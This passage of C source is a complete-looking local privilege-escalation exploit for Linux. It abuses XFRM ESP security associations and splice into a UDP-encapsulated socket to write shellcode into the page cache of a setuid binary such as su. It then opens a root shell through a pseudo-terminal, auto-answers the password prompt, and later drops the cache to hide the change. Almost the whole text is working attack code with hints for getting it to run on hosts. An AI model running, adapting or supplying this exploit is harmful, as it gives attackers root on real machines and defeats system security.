x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,\n\t0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,\n\t0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n};\n\nstatic int save_original(const char *path)\n{\n\tif (g_have_backup) return 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0) return -1;\n\tint n = read(fd, g_backup, PAYLOAD_LEN);\n\tclose(fd);\n\tif (n != PAYLOAD_LEN) return -1;\n\tg_have_backup = 1;\n\treturn 0;\n}\n\nstatic int setup_userns_netns(void)\n{\n\tuid_t ruid = getuid();\n\tgid_t rgid = getgid();\n\n\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {\n\t\tfprintf(stderr, \"unshare: %s\\n\", strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint fd = open(\"/proc/self/setgroups\", O_WRONLY);\n\tif (fd >= 0) { write(fd, \"deny\\n\", 5); close(fd); }\n\n\tchar buf[128];\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", ruid);\n\tfd = open(\"/proc/self/uid_map\", O_WRONLY);\n\tif (fd < 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", rgid);\n\tfd = open(\"/proc/self/gid_map\", O_WRONLY);\n\tif (fd < 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tint s = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (s >= 0) {\n\t\tstruct ifreq ifr;\n\t\tmemset(&ifr, 0, sizeof(ifr));\n\t\tstrncpy(ifr.ifr_name, \"lo\", IFNAMSIZ - 1);\n\t\tif (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {\n\t\t\tifr.ifr_flags |= IFF_UP | IFF_RUNNING;\n\t\t\tioctl(s, SIOCSIFFLAGS, &ifr);\n\t\t}\n\t\tclose(s);\n\t}\n\treturn 0;\n}\n\nstatic void nl_put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)\n{\n\tstruct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));\n\trta->rta_type = type;\n\trta->rta_len = RTA_LENGTH(len);\n\tmemcpy(RTA_DATA(rta), data, len);\n\tnlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);\n}\n\nstatic int add_xfrm_sa(uint32_t spi, uint32_t patch_val)\n{\n\tint sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n\tif (sk < 0) return -1;\n\n\tstruct sockaddr_nl nl = { .nl_family = AF_NETLINK };\n\tif (bind(sk, (struct sockaddr *)&nl, sizeof(nl)) < 0) { close(sk); return -1; }\n\n\tchar buf[4096];\n\tmemset(buf, 0, sizeof(buf));\n\tstruct nlmsghdr *nlh = (struct nlmsghdr *)buf;\n\tnlh->nlmsg_type = XFRM_MSG_NEWSA;\n\tnlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;\n\tnlh->nlmsg_pid = getpid();\n\tnlh->nlmsg_seq = 1;\n\tnlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));\n\n\tstruct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);\n\txs->id.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->id.spi = htonl(spi);\n\txs->id.proto = IPPROTO_ESP;\n\txs->saddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->family = AF_INET;\n\txs->mode = XFRM_MODE_TRANSPORT;\n\txs->replay_window = 0;\n\txs->reqid = 0x1234;\n\txs->flags = XFRM_STATE_ESN;\n\txs->lft.soft_byte_limit = (uint64_t)-1;\n\txs->lft.hard_byte_limit = (uint64_t)-1;\n\txs->lft.soft_packet_limit = (uint64_t)-1;\n\txs->lft.hard_packet_limit = (uint64_t)-1;\n\txs->sel.family = AF_INET;\n\txs->sel.prefixlen_d = 32;\n\txs->sel.prefixlen_s = 32;\n\txs->sel.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->sel.saddr.a4 = inet_addr(\"127.0.0.1\");\n\n\tchar auth_buf[sizeof(struct xfrm_algo_auth) + 32];\n\tmemset(auth_buf, 0, sizeof(auth_buf));\n\tstruct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)auth_buf;\n\tstrncpy(aa->alg_name, \"hmac(sha256)\", sizeof(aa->alg_name) - 1);\n\taa->alg_key_len = 32 * 8;\n\taa->alg_trunc_len = 128;\n\tmemset(aa->alg_key, 0xAA, 32);\n\tnl_put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, auth_buf, sizeof(auth_buf));\n\n\tchar ciph_buf[sizeof(struct xfrm_algo) + 16];\n\tmemset(ciph_buf, 0, sizeof(ciph_buf));\n\tstruct xfrm_algo *ea = (struct xfrm_algo *)ciph_buf;\n\tstrncpy(ea->alg_name, \"cbc(aes)\", sizeof(ea->alg_name) - 1);\n\tea->alg_key_len = 16 * 8;\n\tmemset(ea->alg_key, 0xBB, 16);\n\tnl_put_attr(nlh, XFRMA_ALG_CRYPT, ciph_buf, sizeof(ciph_buf));\n\n\tstruct xfrm_encap_tmpl enc;\n\tmemset(&enc, 0, sizeof(enc));\n\tenc.encap_type = UDP_ENCAP_ESPINUDP;\n\tenc.encap_sport = htons(ENC_PORT);\n\tenc.encap_dport = htons(ENC_PORT);\n\tnl_put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));\n\n\tstruct xfrm_replay_state_esn esn;\n\tmemset(&esn, 0, sizeof(esn));\n\tesn.bmp_len = 1;\n\tesn.oseq = 0;\n\tesn.seq = REPLAY_SEQ;\n\tesn.oseq_hi = 0;\n\tesn.seq_hi = patch_val;\n\tesn.replay_window = 32;\n\tnl_put_attr(nlh, XFRMA_REPLAY_ESN_VAL, &esn, sizeof(esn) + 4);\n\n\tif (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; }\n\n\tchar rbuf[4096];\n\tint n = recv(sk, rbuf, sizeof(rbuf), 0);\n\tclose(sk);\n\tif (n < 0) return -1;\n\n\tstruct nlmsghdr *rh = (struct nlmsghdr *)rbuf;\n\tif (rh->nlmsg_type == NLMSG_ERROR) {\n\t\tstruct nlmsgerr *e = NLMSG_DATA(rh);\n\t\tif (e->error) return -1;\n\t}\n\treturn 0;\n}\n\nstatic int do_one_write(const char *path, off_t offset, uint32_t spi)\n{\n\tint sk_recv = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_recv < 0) return -1;\n\n\tint one = 1;\n\tsetsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));\n\n\tstruct sockaddr_in sa;\n\tmemset(&sa, 0, sizeof(sa));\n\tsa.sin_family = AF_INET;\n\tsa.sin_port = htons(ENC_PORT);\n\tsa.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tif (bind(sk_recv, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_recv); return -1; }\n\n\tint encap = UDP_ENCAP_ESPINUDP;\n\tif (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { close(sk_recv); return -1; }\n\n\tint sk_send = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_send < 0) { close(sk_recv); return -1; }\n\tif (connect(sk_send, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint file_fd = open(path, O_RDONLY);\n\tif (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint pfd[2];\n\tif (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }\n\n\tunsigned char hdr[24];\n\t*(uint32_t *)(hdr + 0) = htonl(spi);\n\t*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);\n\tmemset(hdr + 8, 0xCC, 16);\n\n\tstruct iovec iov = { .iov_base = hdr, .iov_len = sizeof(hdr) };\n\tif (vmsplice(pfd[1], &iov, 1, 0) != (ssize_t)sizeof(hdr))\n\t\tgoto fail;\n\n\toff_t off = offset;\n\tif (splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE) != 16)\n\t\tgoto fail;\n\n\tssize_t s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);\n\tusleep(150 * 1000);\n\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn (s == 40) ? 0 : -1;\n\nfail:\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn -1;\n}\n\n/* corrupt stage error codes (child maps to exit 11..13) */\n#define CORRUPT_ERR_UNSHARE 1\n#define CORRUPT_ERR_XFRM 2\n#define CORRUPT_ERR_WRITE 3\n\nstatic int corrupt_su(void)\n{\n\tif (setup_userns_netns() < 0)\n\t\treturn CORRUPT_ERR_UNSHARE;\n\tusleep(100 * 1000);\n\n\tfor (int i = 0; i < TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\tuint32_t val =\n\t\t\t((uint32_t)shell_elf[i * 4 + 0] << 24) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 1] << 16) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 2] << 8) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 3]);\n\t\tif (add_xfrm_sa(spi, val) < 0)\n\t\t\treturn CORRUPT_ERR_XFRM;\n\t}\n\n\tfor (int i = 0; i < TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\toff_t off = PATCH_OFFSET + (off_t)i * 4;\n\t\tif (do_one_write(g_target, off, spi) < 0)\n\t\t\treturn CORRUPT_ERR_WRITE;\n\t}\n\treturn 0;\n}\n\nstatic const char *corrupt_err_msg(int code)\n{\n\tswitch (code) {\n\tcase CORRUPT_ERR_UNSHARE: return \"unshare / uid_map / lo setup failed in child\";\n\tcase CORRUPT_ERR_XFRM: return \"XFRM SA registration failed (netlink denied?)\";\n\tcase CORRUPT_ERR_WRITE: return \"splice/UDP 4500 write failed\";\n\tdefault: return \"unknown corrupt error\";\n\t}\n}\n\nstatic int target_already_patched(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn 0;\n\tuint8_t got[8];\n\tssize_t n = pread(fd, got, sizeof(got), ENTRY_OFFSET);\n\tclose(fd);\n\tif (n != (ssize_t)sizeof(got))\n\t\treturn 0;\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0;\n}\n\nstatic int verify_patch(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn -1;\n\tuint8_t got[8];\n\tif (pread(fd, got, sizeof(got), ENTRY_OFFSET) != (ssize_t)sizeof(got)) {\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n\tclose(fd);\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0 ? 0 : -1;\n}\n\nstatic int run_esp_corrupt_stage(char *detail, size_t dlen)\n{\n\tpid_t cpid = fork();\n\tif (cpid < 0) {\n\t\tsnprintf(detail, dlen, \"fork: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (cpid == 0) {\n\t\tint rc = corrupt_su();\n\t\t_exit(rc == 0 ? 0 : 10 + rc);\n\t}\n\tint wstatus;\n\tif (waitpid(cpid, &wstatus, 0) < 0) {\n\t\tsnprintf(detail, dlen, \"waitpid: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!WIFEXITED(wstatus)) {\n\t\tsnprintf(detail, dlen, \"child killed by signal %d\", WTERMSIG(wstatus));\n\t\treturn -1;\n\t}\n\tint est = WEXITSTATUS(wstatus);\n\tif (est != 0) {\n\t\tsnprintf(detail, dlen, \"%s\", corrupt_err_msg(est - 10));\n\t\treturn -1;\n\t}\n\tif (verify_patch(g_target) < 0) {\n\t\tsnprintf(detail, dlen,\n\t\t\t \"page cache unchanged at 0x%x (patched kernel / LSM / container?)\",\n\t\t\t ENTRY_OFFSET);\n\t\treturn -1;\n\t}\n\tdetail[0] = '\\0';\n\treturn 0;\n}\n\nstatic int target_is_su_binary(const char *path)\n{\n\tconst char *base = strrchr(path, '/');\n\tbase = base ? base + 1 : path;\n\treturn strcmp(base, \"su\") == 0;\n}\n\nstatic void exec_patched_target(void)\n{\n\tchar *envp[] = { \"TERM=xterm\", NULL };\n\texecle(g_target, g_target, NULL, envp);\n\t_exit(127);\n}\n\nstatic void exec_su_login(void)\n{\n\tstatic const char *paths[] = {\n\t\t\"/bin/su\", \"/usr/bin/su\", \"/sbin/su\", \"/usr/sbin/su\", NULL,\n\t};\n\tfor (int i = 0; paths[i]; i++)\n\t\texecl(paths[i], \"su\", \"-\", (char *)NULL);\n\texeclp(\"su\", \"su\", \"-\", (char *)NULL);\n\t_exit(127);\n}\n\nstatic int run_root_pty(void)\n{\n\tint master = posix_openpt(O_RDWR | O_NOCTTY);\n\tif (master < 0)\n\t\treturn -1;\n\tif (grantpt(master) < 0 || unlockpt(master) < 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tchar *slave_name = ptsname(master);\n\tif (!slave_name) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\n\tstruct winsize ws;\n\tif (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0)\n\t\tioctl(master, TIOCSWINSZ, &ws);\n\n\tpid_t pid = fork();\n\tif (pid < 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tsetsid();\n\t\tint slave = open(slave_name, O_RDWR);\n\t\tif (slave < 0)\n\t\t\t_exit(127);\n\t\tioctl(slave, TIOCSCTTY, 0);\n\t\tdup2(slave, 0);\n\t\tdup2(slave, 1);\n\t\tdup2(slave, 2);\n\t\tif (slave > 2)\n\t\t\tclose(slave);\n\t\tclose(master);\n\t\tif (target_is_su_binary(g_target))\n\t\t\texec_su_login();\n\t\texec_patched_target();\n\t}\n\n\tsignal(SIGTTOU, SIG_IGN);\n\tsignal(SIGTTIN, SIG_IGN);\n\tsignal(SIGPIPE, SIG_IGN);\n\tsignal(SIGHUP, SIG_IGN);\n\n\tstruct termios saved_termios;\n\tint restore_termios = 0;\n\tif (tcgetattr(STDIN_FILENO, &saved_termios) == 0) {\n\t\tstruct termios raw = saved_termios;\n\t\tcfmakeraw(&raw);\n\t\tif (tcsetattr(STDIN_FILENO, TCSANOW, &raw) == 0)\n\t\t\trestore_termios = 1;\n\t}\n\n\tint auto_pw_sent = 0;\n\tint stdin_eof = 0;\n\tint saw_master_output = 0;\n\tint total_ms = 0;\n\tchar buf[4096];\n\n\tfor (;;) {\n\t\tstruct pollfd pfds[2] = {\n\t\t\t{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },\n\t\t\t{ master, POLLIN, 0 },\n\t\t};\n\t\tint pr = poll(pfds, 2, 200);\n\t\tif (pr < 0 && errno != EINTR)\n\t\t\tbreak;\n\t\ttotal_ms += 200;\n\n\t\tif (pfds[1].revents & POLLIN) {\n\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\tif (n <= 0)\n\t\t\t\tbreak;\n\t\t\tsaw_master_output = 1;\n\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\tif (!auto_pw_sent && n < (ssize_t)sizeof(buf)) {\n\t\t\t\tbuf[n] = '\\0';\n\t\t\t\tif (strstr(buf, \"Password\") || strstr(buf, \"password\")) {\n\t\t\t\t\twrite(master, \"\\n\", 1);\n\t\t\t\t\tauto_pw_sent = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (!stdin_eof && (pfds[0].revents & POLLIN)) {\n\t\t\tssize_t n = read(STDIN_FILENO, buf, sizeof(buf));\n\t\t\tif (n <= 0)\n\t\t\t\tstdin_eof = 1;\n\t\t\telse\n\t\t\t\twrite(master, buf, n);\n\t\t}\n\t\tif (pfds[1].revents & (POLLHUP | POLLERR))\n\t\t\tbreak;\n\n\t\tif (!auto_pw_sent && !saw_master_output && total_ms >= 1500) {\n\t\t\twrite(master, \"\\n\", 1);\n\t\t\tauto_pw_sent = 1;\n\t\t}\n\n\t\tint status;\n\t\tpid_t w = waitpid(pid, &status, WNOHANG);\n\t\tif (w == pid) {\n\t\t\tfor (int i = 0; i < 5; i++) {\n\t\t\t\tstruct pollfd pf = { master, POLLIN, 0 };\n\t\t\t\tif (poll(&pf, 1, 50) <= 0)\n\t\t\t\t\tbreak;\n\t\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\t\tif (n <= 0)\n\t\t\t\t\tbreak;\n\t\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (restore_termios)\n\t\ttcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);\n\tclose(master);\n\treturn 0;\n}\n\nstatic int restore_original(void)\n{\n\tif (!g_have_backup) return -1;\n\n\t// just drop the file's page cache -> kernel reloads from disk\n\tint fd = open(g_target, O_RDONLY);\n\tif (fd < 0) return -1;\n\tposix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);\n\tclose(fd);\n\n\t// verify first 8 bytes match backup (disk copy)\n\tunsigned char cur[8];\n\tfd = open(g_target, O_RDONLY);\n\tif (fd < 0) return -1;\n\tint n = pread(fd, cur, 8, 0);\n\tclose(fd);\n\tif (n != 8) return -1;\n\tif (memcmp(cur, g_backup, 8) != 0) return -1;\n\n\treturn 0;\n}\n\nstatic void parse_args(int argc, char **argv)\n{\n\tfor (int i = 1; i < argc; i++) {\n\t\tif (!strcmp(argv[i], \"-v\") || !strcmp(argv[i], \"--verbose\"))\n\t\t\tg_verbose = 1;\n\t\telse if (argv[i][0] != '-')\n\t\t\tg_target = argv[i];\n\t}\n\tif (getenv(\"DIRTYFRAG_VERBOSE\"))\n\t\tg_verbose = 1;\n}\n\nint main(int argc, char **argv)\n{\n\tg_tty = isatty(STDOUT_FILENO);\n\tsetlinebuf(stdout);\n\tparse_args(argc, argv);\n\n\tif (getuid() == 0) {\n\t\texeclp(\"/bin/bash\", \"bash\", (char *)NULL);\n\t\t_exit(1);\n\t}\n\n\tprint_banner();\n\n\tif (check_kernel_config() < 0)\n\t\treturn 1;\n\n\tif (check_userns_runtime() < 0)\n\t\treturn 1;\n\n\tif (scan_setuid_binaries() < 0)\n\t\treturn 1;\n\n\tphase_header(4, \"ESP corrupt (XFRM/UDP 4500)\");\n\tprintf(\" %s\u2192%s target: %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_MAG), g_target, C(C_RST));\n\n\t{\n\t\tchar why[256];\n\t\tif (probe_target(g_target, why, sizeof(why)) < 0) {\n\t\t\tstatus_line(\"target\", 0, why);\n\t\t\tfprintf(stderr,\n\t\t\t\t\"\\n%s [!] Exploit needs read+execute on the setuid binary (open for splice).%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s [!] Shared hosting often blocks reading /usr/bin/su even though 'find' lists it.%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s [!] Use a full VM/VPS/lab where you can: cat %s | head -c 4%s\\n\\n\",\n\t\t\t\tC(C_YEL), g_target, C(C_RST));\n\t\t\treturn 1;\n\t\t}\n\t}\n\tstatus_line(\"target\", 1, \"setuid + readable + openable\");\n\n\tif (target_already_patched(g_target)) {\n\t\tstatus_line(\"patch\", 1, \"already patched \u2014 skip corrupt stage\");\n\t} else {\n\t\tif (save_original(g_target) < 0) {\n\t\t\tstatus_line(\"backup\", 0, \"failed to save 192 original bytes\");\n\t\t\treturn 1;\n\t\t}\n\t\tstatus_line(\"backup\", 1, \"192 bytes saved\");\n\n\t\tprintf(\"\\n%s [*] unshare userns+netns, register %d XFRM SA, splice\u2192UDP 4500...%s\\n\",\n\t\t C(C_YEL), TOTAL_SAS, C(C_RST));\n\n\t\t{\n\t\t\tchar err[256];\n\t\t\tif (run_esp_corrupt_stage(err, sizeof(err)) < 0) {\n\t\t\t\tstatus_line(\"corrupt\", 0, err[0] ? err : \"ESP path failed\");\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"\\n%s [!] Common on shared/VPS hosts: XFRM netlink blocked, splice restricted, or kernel patched.%s\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"%s [!] Try: uname -r and test on WSL2/lab. Without userns: CVE-2026-43500 (rxrpc).%s\\n\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\treturn 1;\n\t\t\t}\n\t\t}\n\t\tstatus_line(\"corrupt\", 1, \"all iterations done\");\n\t\tstatus_line(\"verify\", 1, \"shellcode marker at 0x78 OK\");\n\t}\n\n\tphase_header(5, \"root shell\");\n\tprintf(\"\\n%s\", C(C_GRN));\n\tprintf(\" \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\" \u2551 root shell \u2014 exit to restore \u2551\\n\");\n\tprintf(\" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n\n\tprintf(\" %s\u2192%s spawn: %s%s\\n\\n\", C(C_DIM), C(C_RST), g_target, C(C_RST));\n\tif (run_root_pty() < 0) {\n\t\tstatus_line(\"pty\", 0, \"PTY failed, trying direct exec\");\n\t\texec_patched_target();\n\t\tfprintf(stderr, \"%s [!] exec %s: %s%s\\n\", C(C_RED), g_target, strerror(errno), C(C_RST));\n\t\treturn 1;\n\t}\n\n\tprintf(\"\\n%s [*] shell closed \u2014 restoring page cache...%s\\n\", C(C_YEL), C(C_RST));\n\tif (restore_original() < 0) {\n\t\tfprintf(stderr, \"%s [!] restore failed \u2014 try: echo 3 | sudo tee /proc/sys/vm/drop_caches%s\\n\",\n\t\t C(C_RED), C(C_RST));\n\t\treturn 1;\n\t}\n\tprintf(\"%s [+] target restored from disk.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n", "creation_timestamp": "2026-05-26T12:10:20.000000Z"} 2026-05-26T12:10:20+00:00